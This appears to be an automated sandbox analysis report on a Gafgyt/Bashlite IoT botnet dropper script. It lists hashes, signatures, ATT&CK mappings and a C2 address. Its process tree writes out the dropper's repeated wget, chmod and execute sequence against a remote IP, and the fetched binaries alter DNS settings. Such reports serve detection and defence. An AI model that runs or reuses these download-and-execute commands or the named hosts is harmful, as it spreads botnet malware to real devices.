gafgyt | cb80b4c67663965af99ad05e7e9de251770b96f76e07bc8d8053777ec225b5d6

Analysis

max time kernel
98s
max time network
100s
platform
debian-9_armhf
resource
debian9-armhf-20240729-en
resource tags

arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
18-02-2025 06:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

logsbins.sh
Size

1KB
MD5

98c9c49189a0b83044691596678fd48f
SHA1

e859d05cb239c5e54be4aec9328b60f146200034
SHA256

cb80b4c67663965af99ad05e7e9de251770b96f76e07bc8d8053777ec225b5d6
SHA512

6f2e41ee1ce7e1610d03ad561ab1bec0ddeddfa22cf332c540f5e85de75bde6abaee891cb9f070c7b4845fca158cd42249d3f0cba36e9f482d46026d1f98bd4e

Score

10^/10

gafgyt botnet defense_evasion

Malware Config

Extracted

Family

gafgyt

185.74.222.38:8080

Signatures

Detected Gafgyt variant 14 IoCs

resource	yara_rule
behavioral2/files/fstream-1.dat	family_gafgyt
behavioral2/files/fstream-2.dat	family_gafgyt
behavioral2/files/fstream-3.dat	family_gafgyt
behavioral2/files/fstream-4.dat	family_gafgyt
behavioral2/files/fstream-5.dat	family_gafgyt
behavioral2/files/fstream-6.dat	family_gafgyt
behavioral2/files/fstream-7.dat	family_gafgyt
behavioral2/files/fstream-8.dat	family_gafgyt
behavioral2/files/fstream-9.dat	family_gafgyt
behavioral2/files/fstream-10.dat	family_gafgyt
behavioral2/files/fstream-11.dat	family_gafgyt
behavioral2/files/fstream-12.dat	family_gafgyt
behavioral2/files/fstream-13.dat	family_gafgyt
behavioral2/files/fstream-14.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 16 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
662	chmod
701	chmod
758	chmod
776	chmod
826	chmod
831	chmod
686	chmod
720	chmod
738	chmod
766	chmod
821	chmod
677	chmod
793	chmod
808	chmod
817	chmod
836	chmod

Executes dropped EXE 14 IoCs

ioc	pid	Process
/tmp/b	679	logsbins.sh
/tmp/c	687	logsbins.sh
/tmp/d	703	logsbins.sh
/tmp/e	722	logsbins.sh
/tmp/f	740	logsbins.sh
/tmp/g	759	logsbins.sh
/tmp/h	767	logsbins.sh
/tmp/i	778	logsbins.sh
/tmp/j	794	logsbins.sh
/tmp/k	809	logsbins.sh
/tmp/m	822	logsbins.sh
/tmp/n	827	logsbins.sh
/tmp/o	832	logsbins.sh
/tmp/p	837	logsbins.sh

Writes DNS configuration 1 TTPs 4 IoCs

Writes data to DNS resolver config file.

Adversary-in-the-Middle

T1557

description	ioc	Process
File opened for modification	/etc/resolv.conf	d
File opened for modification	/etc/resolv.conf	e
File opened for modification	/etc/resolv.conf	b
File opened for modification	/etc/resolv.conf	c

Changes its process name 4 IoCs

description	pid	Process
Changes the process name, possibly in an attempt to hide itself	679	b
Changes the process name, possibly in an attempt to hide itself	687	c
Changes the process name, possibly in an attempt to hide itself	703	d
Changes the process name, possibly in an attempt to hide itself	722	e

Writes file to tmp directory 14 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/o	wget
File opened for modification	/tmp/b	wget
File opened for modification	/tmp/g	wget
File opened for modification	/tmp/j	wget
File opened for modification	/tmp/n	wget
File opened for modification	/tmp/i	wget
File opened for modification	/tmp/d	wget
File opened for modification	/tmp/e	wget
File opened for modification	/tmp/f	wget
File opened for modification	/tmp/h	wget
File opened for modification	/tmp/m	wget
File opened for modification	/tmp/p	wget
File opened for modification	/tmp/c	wget
File opened for modification	/tmp/k	wget

/tmp/logsbins.sh
/tmp/logsbins.sh
1⤵
- Executes dropped EXE
PID:645
- /usr/bin/wget
  wget http://194.32.145.243/a
  2⤵
  PID:647
- /bin/chmod
  chmod +x a
  2⤵
  - File and Directory Permissions Modification
  PID:662
- /tmp/a
  ./a
  2⤵
  PID:664
- /bin/rm
  rm -rf a
  2⤵
  PID:666
- /usr/bin/wget
  wget http://194.32.145.243/b
  2⤵
  - Writes file to tmp directory
  PID:668
- /bin/chmod
  chmod +x b
  2⤵
  - File and Directory Permissions Modification
  PID:677
- /tmp/b
  ./b
  2⤵
  - Writes DNS configuration
  - Changes its process name
  PID:679
- /bin/rm
  rm -rf b
  2⤵
  PID:682
- /usr/bin/wget
  wget http://194.32.145.243/c
  2⤵
  - Writes file to tmp directory
  PID:685
- /bin/chmod
  chmod +x c
  2⤵
  - File and Directory Permissions Modification
  PID:686
- /tmp/c
  ./c
  2⤵
  - Writes DNS configuration
  - Changes its process name
  PID:687
- /bin/rm
  rm -rf c
  2⤵
  PID:690
- /usr/bin/wget
  wget http://194.32.145.243/d
  2⤵
  - Writes file to tmp directory
  PID:693
- /bin/chmod
  chmod +x d
  2⤵
  - File and Directory Permissions Modification
  PID:701
- /tmp/d
  ./d
  2⤵
  - Writes DNS configuration
  - Changes its process name
  PID:703
- /bin/rm
  rm -rf d
  2⤵
  PID:706
- /usr/bin/wget
  wget http://194.32.145.243/e
  2⤵
  - Writes file to tmp directory
  PID:709
- /bin/chmod
  chmod +x e
  2⤵
  - File and Directory Permissions Modification
  PID:720
- /tmp/e
  ./e
  2⤵
  - Writes DNS configuration
  - Changes its process name
  PID:722
- /bin/rm
  rm -rf e
  2⤵
  PID:725
- /usr/bin/wget
  wget http://194.32.145.243/f
  2⤵
  - Writes file to tmp directory
  PID:728
- /bin/chmod
  chmod +x f
  2⤵
  - File and Directory Permissions Modification
  PID:738
- /tmp/f
  ./f
  2⤵
  PID:740
- /bin/rm
  rm -rf f
  2⤵
  PID:742
- /usr/bin/wget
  wget http://194.32.145.243/g
  2⤵
  - Writes file to tmp directory
  PID:746
- /bin/chmod
  chmod +x g
  2⤵
  - File and Directory Permissions Modification
  PID:758
- /tmp/g
  ./g
  2⤵
  PID:759
- /bin/rm
  rm -rf g
  2⤵
  PID:761
- /usr/bin/wget
  wget http://194.32.145.243/h
  2⤵
  - Writes file to tmp directory
  PID:763
- /bin/chmod
  chmod +x h
  2⤵
  - File and Directory Permissions Modification
  PID:766
- /tmp/h
  ./h
  2⤵
  PID:767
- /bin/rm
  rm -rf h
  2⤵
  PID:769
- /usr/bin/wget
  wget http://194.32.145.243/i
  2⤵
  - Writes file to tmp directory
  PID:771
- /bin/chmod
  chmod +x i
  2⤵
  - File and Directory Permissions Modification
  PID:776
- /tmp/i
  ./i
  2⤵
  PID:778
- /bin/rm
  rm -rf i
  2⤵
  PID:780
- /usr/bin/wget
  wget http://194.32.145.243/j
  2⤵
  - Writes file to tmp directory
  PID:782
- /bin/chmod
  chmod +x j
  2⤵
  - File and Directory Permissions Modification
  PID:793
- /tmp/j
  ./j
  2⤵
  PID:794
- /bin/rm
  rm -rf j
  2⤵
  PID:796
- /usr/bin/wget
  wget http://194.32.145.243/k
  2⤵
  - Writes file to tmp directory
  PID:798
- /bin/chmod
  chmod +x k
  2⤵
  - File and Directory Permissions Modification
  PID:808
- /tmp/k
  ./k
  2⤵
  PID:809
- /bin/rm
  rm -rf k
  2⤵
  PID:812
- /usr/bin/wget
  wget http://194.32.145.243/l
  2⤵
  PID:813
- /bin/chmod
  chmod +x l
  2⤵
  - File and Directory Permissions Modification
  PID:817
- /tmp/l
  ./l
  2⤵
  PID:818
- /bin/rm
  rm -rf l
  2⤵
  PID:819
- /usr/bin/wget
  wget http://194.32.145.243/m
  2⤵
  - Writes file to tmp directory
  PID:820
- /bin/chmod
  chmod +x m
  2⤵
  - File and Directory Permissions Modification
  PID:821
- /tmp/m
  ./m
  2⤵
  PID:822
- /bin/rm
  rm -rf m
  2⤵
  PID:824
- /usr/bin/wget
  wget http://194.32.145.243/n
  2⤵
  - Writes file to tmp directory
  PID:825
- /bin/chmod
  chmod +x n
  2⤵
  - File and Directory Permissions Modification
  PID:826
- /tmp/n
  ./n
  2⤵
  PID:827
- /bin/rm
  rm -rf n
  2⤵
  PID:829
- /usr/bin/wget
  wget http://194.32.145.243/o
  2⤵
  - Writes file to tmp directory
  PID:830
- /bin/chmod
  chmod +x o
  2⤵
  - File and Directory Permissions Modification
  PID:831
- /tmp/o
  ./o
  2⤵
  PID:832
- /bin/rm
  rm -rf o
  2⤵
  PID:834
- /usr/bin/wget
  wget http://194.32.145.243/p
  2⤵
  - Writes file to tmp directory
  PID:835
- /bin/chmod
  chmod +x p
  2⤵
  - File and Directory Permissions Modification
  PID:836
- /tmp/p
  ./p
  2⤵
  PID:837
- /bin/rm
  rm -rf p
  2⤵
  PID:839

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Adversary-in-the-Middle

T1557

Discovery

Lateral Movement

Collection

Adversary-in-the-Middle

T1557

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/b

Filesize
125KB

MD5
2a31822212e31bdba97c2b77d81ae55f

SHA1
f79bf0f316ca76b6710e2f45a57ae85b4d4ce9eb

SHA256
3786ea07da754523923421729dc438b79e8e920eff1b436c762667567b7c7d30

SHA512
7381d850e04ead1a5f85e1b104d7a4c041f7e106d64a7ee34b372b419057dbeb15f7ede38ec722bda0a3d35bb3d35c1a24e5de70740720bed7e22b668fa17d0f

Download Submit
/tmp/c

Filesize
117KB

MD5
5fde5dc82bcb4337a9452b7603883cbd

SHA1
b783a02f7d5187371360d572ccfc50988be8b8e1

SHA256
12d1c088b1ab362a3469ef57c595247ad59f05187c0c5c0137eba913dc490fe2

SHA512
bc412ad0ddd185c83a4458f23e8433f86fcc10b2beb4f269551d1939a35fcee1e04df1c92e29105d2649831123d5682ea2f6c8687e949931102b5e02a066b60f

Download Submit
/tmp/d

Filesize
139KB

MD5
9574c6e15b3cd6a99216d69a5e67098c

SHA1
508e4c6e40bbdbe55a317f658da3c572fc716513

SHA256
efb7c3a4e5fd61c890c19f1863106ca95a95732a483f8e80c2c2fe92bfe64421

SHA512
509a0df503d97d781fb4c14843fa9d343a70f44093919bcbdf69c9a113ce53c6d8834e4e99913c83f8cc572af0ce46ba427183fedb80e0fa2f7ab433e35303a5

Download Submit
/tmp/e

Filesize
175KB

MD5
9c779dd03f0116c1db1af160a39b05d6

SHA1
1a6b6a6b6121d94f0c6f1d842be8ead9ffb18ae1

SHA256
bbd91c692d5e0754e82a982e7d6f2a4dcbfdd5af5e3d8819a8aec4203e1de83c

SHA512
cb53a8362708f1f9210aad22e80a6a1d2ca152c9f021a42a1248aef85813d0c853bb449121a9aef1b292e886ccc758f2cbdaa6097ff92010514d711da983f544

Download Submit
/tmp/f

Filesize
99KB

MD5
c8796f9714f4a298f1aae8c4b643e830

SHA1
20f206435f4175f2297a5a9a8fc8ae7ec806f915

SHA256
badba6f6bacc30c35eb145821817a19db68735d37380979805786d364f8d0cbd

SHA512
e86dc78f76e94aad1c8da9e693d4d9d193cb759ecbe71398285a23393ed6630bb9cfa5acb5d90bb8e7d34564b4342f418878f3932b4a2e811f287de6c057c0cb

Download Submit
/tmp/g

Filesize
97KB

MD5
c16c1a8c7cc13ad721eb2e399958ca6a

SHA1
12b0550a80ce2a65ef82ade7b84ae27df56b7b66

SHA256
ebf742b55a85955424ecc3864ce3248b5ce63263d5237e18490a12c723ad6eb2

SHA512
267404dcdf4949ff4d006b336508a380975c67bfda5af24dcfea1f971a4994670b28c7b607abd289112a256a2e5153d8c1afb117d8c980162fb60dbab16a43b2

Download Submit
/tmp/h

Filesize
97KB

MD5
7ad8966e2134aed972b9e7e608f44740

SHA1
c3490fca6ca16732fa6cedb7b2c03a161e120238

SHA256
a7522577f8d5427a39b07628b69b0691b30317df0f225d7e24b09e1760ebe724

SHA512
047777a46117fa5419b2c8aaaea635eb2d209afff8bc516c8652eeca624a86e961e1d568fd9d3fcf543afd60f262e8857a93dddcc7bb91c2acdc66f5bf20c34e

Download Submit
/tmp/i

Filesize
115KB

MD5
421be8bebbf3b2449d403771c55aad14

SHA1
f9a06280e4a9bdf064a09e1144dfe90785652a87

SHA256
183c621a08e080617fdaa48eed29de6334b0715ecd52b571daac83f4aae4be28

SHA512
1401fc817a75aa509ecb38f080103f55cdc06c5a1b6fe976df2c74a1d019282843ae888ab40096a4baabf9b347553d38814487b95ce1389e2019d3435005c776

Download Submit
/tmp/j

Filesize
150KB

MD5
1436c169550ade43b1aaaa4cb9d705de

SHA1
f43f76d7c9f4885edc6698153669baec6400c25a

SHA256
09b543c8b2c72e070716802d48686208d16054258964c1b1e15db819b123d092

SHA512
64ecdfc4df41090d607a5d963d660e7c5b1dd3047b6774f1630af8072f7e3045fcfa1363a85e03cca4387483a647868d362c630eddf7ed5367125ad50c4204d5

Download Submit
/tmp/k

Filesize
150KB

MD5
d27ba0aebc1887fb23c43187a1eb3d95

SHA1
aab111ba9f35ee1fbca34f808a05a7c31252c252

SHA256
ef22559baf89f4bc9af7222a687edf9e91b8e69fe743ae25559f5c6b61d9362d

SHA512
c2eea705d332417b7a20d3451a4077dd10bd05d1304296b9ccfdd5c137e15d584961d9b992d82e5d6aaa0fd4c90b4e2d202d6ca855fe4766b9031d28cd95d0a3

Download Submit
/tmp/m

Filesize
113KB

MD5
02a0410937d42f09ab82dace35329058

SHA1
244930375901ffb88341fcac57ccae3bfad4e7f2

SHA256
adb653bddf3cca64bad1793ed255b93578631f74e4ce88065b9eb4a63f197940

SHA512
0e985cf5acc730a518bc3fc97f1f9eb618abda1ae34c4b60198ccf9785e0e921402a7617ce13b9b1527361e81e8b5752004517fa9257d4182807a693ac24cca3

Download Submit
/tmp/n

Filesize
105KB

MD5
72e86594ce066886869fd6047372b050

SHA1
05b1ac7ea86a8a2fc43fc79661669bd9d36595f7

SHA256
c6aedfe25c51288d7f93da8812dbd1aef030c7bd682492637fe1a7d02fee1977

SHA512
121e4dd49238dab0d9c9070b5159de7719ccc441cfc04cc9792a102b2cc7615b442033337d137cd889d97ba218ec5bdbcfb5e0b470bf0224dcd7e2adcc2531b1

Download Submit
/tmp/o

Filesize
123KB

MD5
f7d5f4c3a101fbe0a18e28d1e0dc5493

SHA1
1ac5190b66232a83cca200f651ed2b080a0382d0

SHA256
31100b61c98e672255bfe6d40369799d766b6b96b1efb4ce2c49747efdf8ab7e

SHA512
dad5dd54d0f39c5d9f579281e38ffefb935300c02c41abfb88a360b4252513c7b70a30215a4786ffae745d6851011fb2b16172aa971ef8ca191a9052fb1866c4

Download Submit
/tmp/p

Filesize
109KB

MD5
3899fd75311d4b34aad8db2d1a4b3b03

SHA1
9673fc5503f1342822d325ab784c1b20f03b2a2e

SHA256
4c96e9af9a3092ce59c8f49474370e7286c41e07c6d9af6140088174d19c0ea2

SHA512
12ce22069821a591a8e0de562a60b68573f44cd195cea66b9b4f676b4baaa606283e9edcbdc655252630aec8109b805f5aefbb1239397e389116d53102fe5a81

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads